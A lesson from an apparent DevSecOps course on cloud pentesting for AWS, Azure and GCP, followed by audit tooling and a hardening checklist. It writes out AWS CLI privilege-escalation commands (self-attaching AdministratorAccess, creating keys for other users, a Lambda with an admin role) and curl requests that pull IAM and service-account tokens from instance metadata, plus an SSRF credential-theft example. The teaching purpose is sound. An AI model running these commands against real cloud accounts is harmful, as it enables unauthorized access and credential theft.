Chuyển đến nội dung chính

Lesson 17: Cloud Pentesting — AWS, Azure, GCP

Cloud-specific attack surfaces, IAM misconfigurations, S3 bucket enumeration, instance metadata SSRF, Prowler/ScoutSuite.

🔒 DevSecOps — Lesson 17 Lesson 17: Cloud Pentesting — AWS, Azure, GCP

Performance Testing & Pentest: Enterprise Standard Process 2026

Part 4: Advanced Pentest — Cloud, Containers & AI

xdev.asia

1. Cloud Attack Surface

Cloud Attack Surface Map:

┌─────────────────────────────────────────────────────┐
│                  Cloud Environment                  │
├──────────┬──────────┬──────────┬────────────────────┤
│   IAM    │ Storage  │ Compute  │   Networking       │
├──────────┼──────────┼──────────┼────────────────────┤
│Overly    │Public S3 │SSRF →    │Security Groups     │
│permissive│buckets   │metadata  │too open            │
│policies  │          │service   │                    │
│          │Public    │          │VPC peering          │
│Cross-acct│blob      │Exposed   │misconfig           │
│role      │containers│APIs      │                    │
│confusion │          │          │Missing WAF         │
│          │Exposed   │Unpatched │                    │
│Key       │databases │images    │No flow logs        │
│rotation  │(RDS/CosmosDB)       │                    │
└──────────┴──────────┴──────────┴────────────────────┘

Cloud Provider Pentest Policies:
  AWS:   No permission needed for most tests
         (except DDoS, zone walking, large-scale)
  Azure: No permission needed (standard pentest)
         Must follow ROE: aka.ms/pentest-rules
  GCP:   No permission needed
         AUP applies: cloud.google.com/aup

2. AWS IAM Misconfigurations

# --- IAM Enumeration ---

# List all IAM users
aws iam list-users --query 'Users[*].[UserName,CreateDate]'

# Check user policies
aws iam list-attached-user-policies --user-name target-user
aws iam list-user-policies --user-name target-user

# Get inline policy document
aws iam get-user-policy --user-name target-user \
  --policy-name MyPolicy

# Check for privilege escalation paths
# Using Pacu (AWS exploitation framework)
pacu
> import_keys stolen_key
> run iam__enum_users_roles_policies_groups
> run iam__privesc_scan

# --- Common IAM misconfigs ---

# 1. Wildcard permissions
# ❌ "Effect": "Allow", "Action": "*", "Resource": "*"

# 2. PassRole without restrictions
# Allows user to pass any role to a service
# ❌ "Action": "iam:PassRole", "Resource": "*"

# 3. AssumeRole trust policy too broad
# ❌ "Principal": {"AWS": "*"}
# --- AWS Privilege Escalation Techniques ---

# Method 1: Create new policy version
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/MyPolicy \
  --policy-document file://admin-policy.json \
  --set-as-default

# Method 2: Attach admin policy to self
aws iam attach-user-policy \
  --user-name myuser \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Method 3: Create access key for another user
aws iam create-access-key --user-name admin-user

# Method 4: Lambda privilege escalation
# Create Lambda with admin role → execute to gain admin access
aws lambda create-function \
  --function-name escalate \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --runtime python3.12 \
  --zip-file fileb://escalate.zip

3. S3 / Storage Enumeration

# --- S3 Bucket Enumeration ---

# Check if bucket exists and is public
aws s3 ls s3://target-company-data --no-sign-request 2>/dev/null
aws s3 ls s3://target-company-backup --no-sign-request 2>/dev/null

# S3 bucket naming patterns to try
# {company}-backup, {company}-data, {company}-logs
# {company}-dev, {company}-staging, {company}-prod
# {company}-assets, {company}-uploads

# Automated bucket finder
python3 cloud_enum.py -k example-company

# Check bucket ACL
aws s3api get-bucket-acl --bucket target-bucket --no-sign-request

# Check bucket policy
aws s3api get-bucket-policy --bucket target-bucket --no-sign-request

# --- Azure Blob Storage ---
# Anonymous access check
curl "https://targetaccount.blob.core.windows.net/\$logs?restype=container&comp=list"
curl "https://targetaccount.blob.core.windows.net/data?restype=container&comp=list"

# --- GCP Storage ---
gsutil ls gs://target-bucket
curl "https://storage.googleapis.com/target-bucket"

4. Instance Metadata SSRF

# AWS Instance Metadata Service (IMDS)
# IMDSv1 — vulnerable to SSRF
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

# Response contains temporary AWS credentials:
# {
#   "AccessKeyId": "ASIA...",
#   "SecretAccessKey": "...",
#   "Token": "...",
#   "Expiration": "2026-04-01T12:00:00Z"
# }

# IMDSv2 — requires token (more secure)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/

# Azure Instance Metadata
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Azure Managed Identity token
curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# GCP Metadata
curl -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
# SSRF → Cloud Credential Theft Example
# Vulnerable application accepts URL parameter

# Attacker sends:
# POST /api/fetch-image
# {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/WebAppRole"}

# Application fetches URL internally → returns IAM credentials
# Attacker now has temporary AWS credentials!

# Mitigation:
# 1. Enforce IMDSv2 (requires PUT token)
# 2. Block 169.254.169.254 in application
# 3. Use VPC endpoint policies
# 4. Validate/whitelist URLs in application

5. Prowler & ScoutSuite — Cloud Security Audit

# --- Prowler — AWS Security Assessment ---

# Install
pip install prowler

# Full AWS audit
prowler aws --output-formats html,json

# Specific compliance
prowler aws --compliance cis_2.0_aws
prowler aws --compliance gdpr_aws
prowler aws --compliance pci_3.2.1_aws

# Specific checks
prowler aws --check-group iam
prowler aws --check-group s3
prowler aws --check-group logging

# Azure audit
prowler azure --subscription-ids YOUR_SUB_ID
prowler azure --compliance cis_2.0_azure

# GCP audit
prowler gcp --project-id YOUR_PROJECT
# --- ScoutSuite — Multi-cloud audit ---

# Install
pip install scoutsuite

# AWS assessment
scout aws --profile pentest-profile

# Azure assessment
scout azure --cli

# GCP assessment
scout gcp --user-account --project-id PROJECT_ID

# Results → HTML report with findings dashboard
# Open scout-report/report.html
Cloud Pentest Checklist:

IAM:
  □ Users with console access but no MFA
  □ Access keys older than 90 days
  □ Overly permissive policies (*, Admin)
  □ Cross-account trust misconfigurations
  □ Service-linked role abuse paths

Storage:
  □ Public S3 buckets / blob containers
  □ Unencrypted data at rest
  □ Overly permissive bucket policies
  □ Versioning disabled (data loss risk)

Compute:
  □ IMDSv1 enabled (SSRF risk)
  □ Public security groups (0.0.0.0/0)
  □ Unencrypted EBS volumes
  □ Outdated AMIs / container images

Networking:
  □ VPC flow logs disabled
  □ Default VPC in use
  □ Public RDS / database instances
  □ Missing WAF / DDoS protection

Logging:
  □ CloudTrail / Activity Log disabled
  □ GuardDuty / Defender not enabled
  □ Log retention too short
  □ No alerting on suspicious activity

6. Summary

  • Cloud attack surface: IAM, Storage, Compute, Networking
  • IAM: Enumeration, privilege escalation paths, policy analysis
  • Storage: Public bucket enumeration, ACL/policy review
  • Metadata SSRF: IMDSv1 credential theft, enforce IMDSv2
  • Prowler + ScoutSuite: Automated cloud security auditing

The next article will go into Container & Kubernetes Security Testing.